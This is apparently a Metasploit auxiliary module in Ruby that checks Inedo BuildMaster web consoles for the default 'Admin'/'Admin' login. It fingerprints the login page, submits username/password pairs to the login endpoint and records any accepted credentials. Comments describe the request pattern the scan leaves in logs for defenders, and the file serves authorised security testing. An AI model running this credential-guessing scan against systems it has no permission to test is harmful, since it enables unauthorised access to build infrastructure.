GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/http/buildmaster_login.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
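# Auxiliary scanner that checks whether an Inedo BuildMaster web console
# accepts a username/password pair. The registered defaults are the
# vendor-default account named in the description ('Admin' / 'Admin').
#
# For defenders: a hit on the default pair means the built-in Admin password
# was never changed on that instance. Each attempt is a form POST to the
# LogIn endpoint used in #do_login, preceded by one GET of /log-in per host,
# so that request pattern is what this scan looks like in web-server logs.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  # Registers module metadata and options.
  #
  # @param info [Hash] metadata overrides merged in through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Inedo BuildMaster Login Scanner',
        'Description' => %q{
          This module will attempt to authenticate to BuildMaster. There is a default user 'Admin'
          which has the default password 'Admin'.
        },
        'Author' => [ 'James Otten <jamesotten1[at]gmail.com>' ],
        'License' => MSF_LICENSE,
        'DefaultOptions' => { 'VERBOSE' => true },
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(81),
        OptString.new('USERNAME', [false, 'Username to authenticate as', 'Admin']),
        OptString.new('PASSWORD', [false, 'Password to authenticate with', 'Admin'])
      ]
    )
  end

  # Per-host entry point invoked by the Scanner mixin.
  #
  # Skips hosts that do not fingerprint as BuildMaster, then hands every
  # candidate pair from AuthBrute#each_user_pass to #do_login. The block's
  # value is do_login's return value, which each_user_pass uses for flow
  # control (:abort, :next_user).
  #
  # @param ip [String] target address supplied by the Scanner mixin (unused
  #   here; requests go through the HttpClient mixin's configured target)
  def run_host(ip)
    return unless buildmaster?

    each_user_pass do |user, pass|
      do_login(user, pass)
    end
  end

  # Fingerprints the target by fetching /log-in and looking for the
  # BuildMaster_Version marker in a 200 response.
  #
  # @return [Boolean] true when the page looks like BuildMaster
  def buildmaster?
    begin
      res = send_request_cgi('uri' => '/log-in')
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
      print_error("#{peer} - HTTP Connection Failed")
      return false
    end

    unless res && res.code == 200 && res.body.include?('BuildMaster_Version')
      print_error("#{peer} - Application does not appear to be BuildMaster")
      return false
    end

    # [^<]* instead of a greedy .* so the capture ends at the first closing
    # tag; with .* a second </span> on the same line would be swallowed into
    # the reported version string. nil (printed as empty) when nothing matches.
    version = res.body[%r{<span id="BuildMaster_Version">([^<]*)</span>}, 1]
    print_good("#{peer} - Identified BuildMaster #{version}")
    true
  end

  # Decides whether a login response reports success.
  #
  # Only a 200 response whose body is a JSON object with a truthy
  # 'succeeded' member counts. Anything else (no response, other status,
  # unparsable body, JSON that is not an object) is a failed login.
  #
  # @param res [#code, #body, nil] HTTP response from send_request_cgi
  # @return [Boolean]
  def login_succeeded?(res)
    return false unless res && res.code == 200

    body = JSON.parse(res.body)
    # A JSON array or scalar parses fine but has no 'succeeded' member;
    # checking the type avoids relying on a rescue for that case.
    return false unless body.is_a?(Hash)

    body['succeeded'] ? true : false
  rescue JSON::ParserError, TypeError, EncodingError
    # Malformed JSON, a nil body, or a body that cannot be converted to
    # UTF-8. Rescuing only these keeps unrelated programming errors visible
    # instead of silently reporting "login failed".
    false
  end

  # Submits one username/password pair to the BuildMaster login endpoint and
  # records the credential when it is accepted.
  #
  # @param user [String] username to try
  # @param pass [String] password to try
  # @return [Symbol, nil] :abort when the host cannot be reached,
  #   :next_user when the pair was accepted, nil when it was rejected
  def do_login(user, pass)
    print_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}")
    begin
      res = send_request_cgi(
        {
          'uri' => '/0x44/BuildMaster.Web.WebApplication/Inedo.BuildMaster.Web.WebApplication.Pages.LogInPage/LogIn',
          'method' => 'POST',
          'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' },
          'vars_post' => {
            'userName' => user,
            'password' => pass
          }
        }
      )
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
      vprint_error("#{peer} - HTTP Connection Failed...")
      return :abort
    end

    if login_succeeded?(res)
      print_good("SUCCESSFUL LOGIN - #{peer} - #{user.inspect}:#{pass.inspect}")
      store_valid_credential(user: user, private: pass)
      # Tell each_user_pass this user is done. Without this the block
      # returned store_valid_credential's value, so further passwords were
      # still sent for an already-confirmed account (needless login traffic
      # and lockout risk on the tested system) and STOP_ON_SUCCESS was
      # never honoured.
      :next_user
    else
      print_error("FAILED LOGIN - #{peer} - #{user.inspect}:#{pass.inspect}")
      nil
    end
  end
end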